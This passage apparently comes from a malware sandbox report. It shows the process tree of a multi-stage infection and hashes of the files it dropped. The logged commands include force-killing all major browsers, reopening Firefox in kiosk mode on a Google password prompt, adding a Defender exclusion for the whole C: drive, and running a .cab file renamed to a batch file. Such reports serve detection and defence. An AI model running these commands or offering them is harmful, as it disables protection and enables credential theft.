                                                                                          "C:\Users\Admin\AppData\Local\Temp\10428250101\dc9813e710.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4572
                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:4568
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10428260101\8b2e4e6c8c.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10428260101\8b2e4e6c8c.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:720
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10428270101\22c3dbcd99.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10428270101\22c3dbcd99.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:736
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10428280101\ffa1739846.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10428280101\ffa1739846.exe"
                                                                                          3⤵
                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                          • Checks BIOS information in registry
                                                                                          • Executes dropped EXE
                                                                                          • Identifies Wine through registry keys
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5380
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10428290101\073096bce1.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10428290101\073096bce1.exe"
                                                                                          3⤵
                                                                                          • Checks BIOS information in registry
                                                                                          • Executes dropped EXE
                                                                                          PID:5172
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10428300101\edf60bfe1f.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10428300101\edf60bfe1f.exe"
                                                                                          3⤵
                                                                                            PID:11812
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /F /IM firefox.exe /T
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:15496
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /F /IM chrome.exe /T
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:19132
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /F /IM msedge.exe /T
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:19404
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /F /IM opera.exe /T
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:18536
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /F /IM brave.exe /T
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:17912
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                              4⤵
                                                                                                PID:24036
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                  5⤵
                                                                                                    PID:24052
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1904 -prefsLen 27099 -prefMapHandle 1908 -prefMapSize 270279 -ipcHandle 1988 -initialChannelId {21944edb-66da-4b41-9338-8b275f95bfaa} -parentPid 24052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.24052" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                      6⤵
                                                                                                        PID:24368
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2464 -prefsLen 27135 -prefMapHandle 2468 -prefMapSize 270279 -ipcHandle 2476 -initialChannelId {e296b442-0a20-492a-9fc0-f179dc6bdaba} -parentPid 24052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.24052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                        6⤵
                                                                                                          PID:24448
                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3504 -prefsLen 25213 -prefMapHandle 3508 -prefMapSize 270279 -jsInitHandle 3512 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2840 -initialChannelId {a381d7a8-b3e2-41c8-ab00-c11073a85cc3} -parentPid 24052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.24052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                          6⤵
                                                                                                            PID:5312
                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3696 -prefsLen 27325 -prefMapHandle 3700 -prefMapSize 270279 -ipcHandle 2780 -initialChannelId {5ffdf06d-734d-4a1b-b8f3-7b4e0790aad2} -parentPid 24052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.24052" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                            6⤵
                                                                                                              PID:23796
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4372 -prefsLen 34824 -prefMapHandle 4376 -prefMapSize 270279 -jsInitHandle 4380 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4388 -initialChannelId {70b9c514-eee8-4804-89fd-1f520496daa9} -parentPid 24052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.24052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                              6⤵
                                                                                                                PID:5740
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5384 -prefsLen 35012 -prefMapHandle 5388 -prefMapSize 270279 -ipcHandle 5328 -initialChannelId {2c0aac0d-accc-41e0-89b2-49d50146c4e6} -parentPid 24052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.24052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                6⤵
                                                                                                                  PID:6356
                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5624 -prefsLen 32952 -prefMapHandle 3268 -prefMapSize 270279 -jsInitHandle 5628 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4552 -initialChannelId {7fb48236-f9c2-4847-9ab7-259e31a6e8f8} -parentPid 24052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.24052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                  6⤵
                                                                                                                    PID:7104
                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5728 -prefsLen 32952 -prefMapHandle 5732 -prefMapSize 270279 -jsInitHandle 5736 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5708 -initialChannelId {794e9ca5-6dc1-4c7d-b3d8-37530917f67f} -parentPid 24052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.24052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                    6⤵
                                                                                                                      PID:7156
                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5752 -prefsLen 32952 -prefMapHandle 5756 -prefMapSize 270279 -jsInitHandle 5760 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5768 -initialChannelId {c70a2791-bed6-48d0-8982-7d4171f75ef3} -parentPid 24052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.24052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                      6⤵
                                                                                                                        PID:7184
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10428310101\bb2dfc7ba6.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10428310101\bb2dfc7ba6.exe"
                                                                                                                  3⤵
                                                                                                                    PID:19116
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10428320101\4WMUMmx.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10428320101\4WMUMmx.exe"
                                                                                                                    3⤵
                                                                                                                      PID:23528
                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                        4⤵
                                                                                                                          PID:17620
                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                          4⤵
                                                                                                                            PID:17636
                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                            4⤵
                                                                                                                              PID:17644
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 17644 -s 1032
                                                                                                                                5⤵
                                                                                                                                • Program crash
                                                                                                                                PID:6996
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10428330101\TbV75ZR.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10428330101\TbV75ZR.exe"
                                                                                                                            3⤵
                                                                                                                              PID:23464
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                4⤵
                                                                                                                                  PID:23848
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10428340101\dojG16n.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10428340101\dojG16n.exe"
                                                                                                                                3⤵
                                                                                                                                  PID:24152
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                    4⤵
                                                                                                                                      PID:24304
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10428350101\7IIl2eE.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10428350101\7IIl2eE.exe"
                                                                                                                                    3⤵
                                                                                                                                      PID:6380
                                                                                                                                      • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                                                        4⤵
                                                                                                                                          PID:7040
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10428360101\UZPt0hR.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10428360101\UZPt0hR.exe"
                                                                                                                                        3⤵
                                                                                                                                          PID:7640
                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                            cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                            4⤵
                                                                                                                                              PID:7804
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:8092
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              "C:\Windows\system32\svchost.exe"
                                                                                                                                              4⤵
                                                                                                                                                PID:7812
                                                                                                                                                • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                                                                  "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                                                                  5⤵
                                                                                                                                                    PID:8324
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                                                                    5⤵
                                                                                                                                                      PID:8340
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10428380101\5a4a1be4a3.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10428380101\5a4a1be4a3.exe"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:14532
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10428390101\UZSECGPC.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10428390101\UZSECGPC.exe"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:6272
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\{89AA7DA2-AE7B-4209-B4C1-8457DF570AA5}\UZSECGPC.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\{89AA7DA2-AE7B-4209-B4C1-8457DF570AA5}\UZSECGPC.exe -package:"C:\Users\Admin\AppData\Local\Temp\10428390101\UZSECGPC.exe" -no_selfdeleter -IS_temp -media_path:"C:\Users\Admin\AppData\Local\Temp\{89AA7DA2-AE7B-4209-B4C1-8457DF570AA5}\Disk1\" -tempdisk1folder:"C:\Users\Admin\AppData\Local\Temp\{89AA7DA2-AE7B-4209-B4C1-8457DF570AA5}\" -IS_OriginalLauncher:"C:\Users\Admin\AppData\Local\Temp\{89AA7DA2-AE7B-4209-B4C1-8457DF570AA5}\Disk1\UZSECGPC.exe"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5648
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\ISBEW64.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{8F67982A-D6EB-473C-A3FB-002A2529C372}
                                                                                                                                                            5⤵
                                                                                                                                                              PID:10252
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\ISBEW64.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{F3FAA190-8501-483E-9736-964F57FCB3C1}
                                                                                                                                                              5⤵
                                                                                                                                                                PID:10392
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\ISBEW64.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{0C476CEE-6CC0-4855-B7B9-B29FBF9D46FB}
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:10480
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\ISBEW64.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{56BB8FD5-FCE4-47DC-A385-AF56E477AB71}
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:10868
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\ISBEW64.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{1058AE83-3353-4C91-8447-3F4CD38BD6D3}
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:10964
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\ISBEW64.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{C3EEC107-0EAB-430A-AB85-1C6FECA0A7BB}
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:20924
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\{38C49E83-05E9-4C6A-9256-6AA74482FDC5}\CamMenuMaker.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\{D4AAF6D0-B34A-42D7-8ED5-007B0831FFA9}\{38C49E83-05E9-4C6A-9256-6AA74482FDC5}\CamMenuMaker.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:21048
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Uj_debug_v5\CamMenuMaker.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Uj_debug_v5\CamMenuMaker.exe
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:21208
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10428400101\Rm3cVPI.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10428400101\Rm3cVPI.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2816
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10428410101\a9b2f2dbe1.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10428410101\a9b2f2dbe1.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:21436
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6068 -ip 6068
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:2952
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:5716
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:5624
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5916
                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5592
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:2368
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\1vSU580j\lRDjoS0Ybg8uND8V.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5984
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1vSU580j\lRDjoS0Ybg8uND8V.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1vSU580j\lRDjoS0Ybg8uND8V.exe
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:15764
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\x8LNZBbr\8VO6aOVOuPzdv8uv.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\x8LNZBbr\8VO6aOVOuPzdv8uv.exe 15764
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:15804
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 15804 -s 652
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:23944
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1vSU580j\MusiSjo7zyFjZvkg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1vSU580j\MusiSjo7zyFjZvkg.exe 15764
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:14460
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 14460 -s 616
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:9032
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1vSU580j\gMLen91NaplN2ONI.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1vSU580j\gMLen91NaplN2ONI.exe 15764
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:10892
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 10892 -s 624
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                PID:21020
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4692 -ip 4692
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:11248
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:15840
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1460 -ip 1460
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:17500
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:17708
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:17740
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 15804 -ip 15804
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:23792
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 17644 -ip 17644
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:6520
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:7972
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:7980
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 14460 -ip 14460
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:8868
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10892 -ip 10892
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:20940

                                                                                                                                                                                                              Network

                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                              • C:\ProgramData\0rqi589z58.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                2.5MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                bee9603b0659ec222790915baf8793f9

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                f62a981a0c35ab65692fe4a4e25da3fa918bee0d

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                a2895294d3ba0fa269b98c2c7e5959a7649d37da9de204ba3c9bb8b6adef5be9

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                7860f61932117fc7c13d43dc4d7fa6e9f5e88bb65c68d82e32cf87ca258f7538b1250dabce83d49088c5f1cae0d61ab2d3a506629e511446308e68b595310bfc

                                                                                                                                                                                                              • C:\ProgramData\lxt00zm7y5.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.9MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                7b545a4a0f8febad62cff17b5b8f326f

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                81cbbd98a6282ff3ab0400e4f6b82ce549401873

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                585392ec23db6d24697c38aec92e87985a418587d55f6b8b4467d12423205e36

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                7a0d4e6fc018256cdbe063351d0c9ba8cbe891eb7dbe1da18cad84ad7b6a273d704842b35d8fa8c1eab4ea9f4c8bfaf0447b5a5a03128e50b55bbdeb85b7bee4

                                                                                                                                                                                                              • C:\ProgramData\xt2db\26pzcb

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                288KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                93b940a7af99ef3b6de837675d8cdb35

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                86fd28987e31ab4c7392d11aa5168f7489345540

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                3a5e8f39a83e5849040ae2534bfc6be2085c51cf5a88d618bfed2d4808f9aa5b

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                3dcdc5b5c0da68e0651cf9bea2d2dc62d4a7b867549ae348debc8fc9cbec1a99ebb78962d2b2008497181c37b88cbfce3b3041e2163f8e40f2f19266455d651e

                                                                                                                                                                                                              • C:\ProgramData\ymo8gva1vk.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                251KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                58d3a0d574e37dc90b40603f0658abd2

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                bf5419ce7000113002b8112ace2a9ac35d0dc557

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                649B

                                                                                                                                                                                                                MD5

